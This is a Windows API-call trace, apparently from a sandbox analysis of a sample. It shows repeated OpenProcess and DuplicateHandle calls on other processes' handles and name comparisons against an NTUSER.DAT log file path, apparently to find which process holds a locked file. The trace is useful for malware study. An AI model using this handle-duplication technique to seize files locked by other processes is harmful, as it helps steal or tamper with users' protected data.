[0162.407] CloseHandle (hObject=0x1e4) returned 1 [0162.407] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.407] CloseHandle (hObject=0x194) returned 1 [0162.407] CloseHandle (hObject=0x1e8) returned 1 [0162.407] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.407] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.408] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.409] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.409] CloseHandle (hObject=0x1e4) returned 1 [0162.409] CloseHandle (hObject=0x194) returned 1 [0162.409] CloseHandle (hObject=0x1e8) returned 1 [0162.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.409] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.410] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.410] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.411] CloseHandle (hObject=0x1e4) returned 1 [0162.411] CloseHandle (hObject=0x194) returned 1 [0162.411] CloseHandle (hObject=0x1e8) returned 1 [0162.411] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.411] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.412] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.417] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.417] CloseHandle (hObject=0x1e4) returned 1 [0162.417] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.417] CloseHandle (hObject=0x194) returned 1 [0162.417] CloseHandle (hObject=0x1e8) returned 1 [0162.417] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.417] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.418] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.419] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.419] CloseHandle (hObject=0x1e4) returned 1 [0162.419] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.419] CloseHandle (hObject=0x194) returned 1 [0162.419] CloseHandle (hObject=0x1e8) returned 1 [0162.419] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.419] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.420] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.421] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.421] CloseHandle (hObject=0x1e4) returned 1 [0162.421] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.421] CloseHandle (hObject=0x194) returned 1 [0162.421] CloseHandle (hObject=0x1e8) returned 1 [0162.421] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0162.421] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.422] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.423] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.423] CloseHandle (hObject=0x1e4) returned 1 [0162.423] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.423] CloseHandle (hObject=0x194) returned 1 [0162.423] CloseHandle (hObject=0x1e8) returned 1 [0162.423] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.423] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.424] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.424] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.425] CloseHandle (hObject=0x1e4) returned 1 [0162.425] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.425] CloseHandle (hObject=0x194) returned 1 [0162.425] CloseHandle (hObject=0x1e8) returned 1 [0162.425] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.425] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.426] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.426] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.427] CloseHandle (hObject=0x1e4) returned 1 [0162.427] CloseHandle (hObject=0x194) returned 1 [0162.427] CloseHandle (hObject=0x1e8) returned 1 [0162.427] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.427] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.428] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.429] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.429] CloseHandle (hObject=0x1e4) returned 1 [0162.429] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.429] CloseHandle (hObject=0x194) returned 1 [0162.429] CloseHandle (hObject=0x1e8) returned 1 [0162.429] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.429] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.430] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.431] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.431] CloseHandle (hObject=0x1e4) returned 1 [0162.431] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.431] CloseHandle (hObject=0x194) returned 1 [0162.431] CloseHandle (hObject=0x1e8) returned 1 [0162.431] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.431] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.432] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.433] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.433] CloseHandle (hObject=0x1e4) returned 1 [0162.433] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0162.433] CloseHandle (hObject=0x194) returned 1 [0162.433] CloseHandle (hObject=0x1e8) returned 1 [0162.433] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.433] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.434] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.435] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.435] CloseHandle (hObject=0x1e4) returned 1 [0162.435] CloseHandle (hObject=0x194) returned 1 [0162.435] CloseHandle (hObject=0x1e8) returned 1 [0162.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0162.435] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.435] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.436] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.436] CloseHandle (hObject=0x1e4) returned 1 [0162.436] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0162.436] CloseHandle (hObject=0x194) returned 1 [0162.436] CloseHandle (hObject=0x1e8) returned 1 [0162.437] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.437] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.437] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.438] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.438] CloseHandle (hObject=0x1e4) returned 1 [0162.439] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.439] CloseHandle (hObject=0x194) returned 1 [0162.439] CloseHandle (hObject=0x1e8) returned 1 [0162.439] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.439] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.439] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.440] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.440] CloseHandle (hObject=0x1e4) returned 1 [0162.440] CloseHandle (hObject=0x194) returned 1 [0162.440] CloseHandle (hObject=0x1e8) returned 1 [0162.440] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.440] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.441] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.442] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.442] CloseHandle (hObject=0x1e4) returned 1 [0162.442] CloseHandle (hObject=0x194) returned 1 [0162.442] CloseHandle (hObject=0x1e8) returned 1 [0162.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.442] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.443] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.444] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.444] CloseHandle (hObject=0x1e4) returned 1 [0162.444] CloseHandle (hObject=0x194) returned 1 [0162.444] CloseHandle (hObject=0x1e8) returned 1 [0162.444] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.444] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.445] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.446] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.446] CloseHandle (hObject=0x1e4) returned 1 [0162.446] CloseHandle (hObject=0x194) returned 1 [0162.446] CloseHandle (hObject=0x1e8) returned 1 [0162.446] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.446] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.446] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.447] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.447] CloseHandle (hObject=0x1e4) returned 1 [0162.447] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.447] CloseHandle (hObject=0x194) returned 1 [0162.447] CloseHandle (hObject=0x1e8) returned 1 [0162.447] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.448] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.448] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.449] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.449] CloseHandle (hObject=0x1e4) returned 1 [0162.449] CloseHandle (hObject=0x194) returned 1 [0162.449] CloseHandle (hObject=0x1e8) returned 1 [0162.449] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.449] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.450] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.451] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.451] CloseHandle (hObject=0x1e4) returned 1 [0162.451] CloseHandle (hObject=0x194) returned 1 [0162.451] CloseHandle (hObject=0x1e8) returned 1 [0162.451] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.451] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.452] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.453] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.453] CloseHandle (hObject=0x1e4) returned 1 [0162.453] CloseHandle (hObject=0x194) returned 1 [0162.453] CloseHandle (hObject=0x1e8) returned 1 [0162.453] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.453] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.454] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.455] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.455] CloseHandle (hObject=0x1e4) returned 1 [0162.455] CloseHandle (hObject=0x194) returned 1 [0162.455] CloseHandle (hObject=0x1e8) returned 1 [0162.455] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.455] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.456] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.457] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.457] CloseHandle (hObject=0x1e4) returned 1 [0162.457] CloseHandle (hObject=0x194) returned 1 [0162.457] CloseHandle (hObject=0x1e8) returned 1 [0162.457] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.457] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.457] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.458] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.459] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.459] CloseHandle (hObject=0x1e4) returned 1 [0162.459] CloseHandle (hObject=0x194) returned 1 [0162.459] CloseHandle (hObject=0x1e8) returned 1 [0162.459] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.459] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.459] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.460] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.461] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.461] CloseHandle (hObject=0x1e4) returned 1 [0162.461] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.461] CloseHandle (hObject=0x194) returned 1 [0162.461] CloseHandle (hObject=0x1e8) returned 1 [0162.461] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.461] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.462] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.463] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.463] CloseHandle (hObject=0x1e4) returned 1 [0162.463] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.463] CloseHandle (hObject=0x194) returned 1 [0162.463] 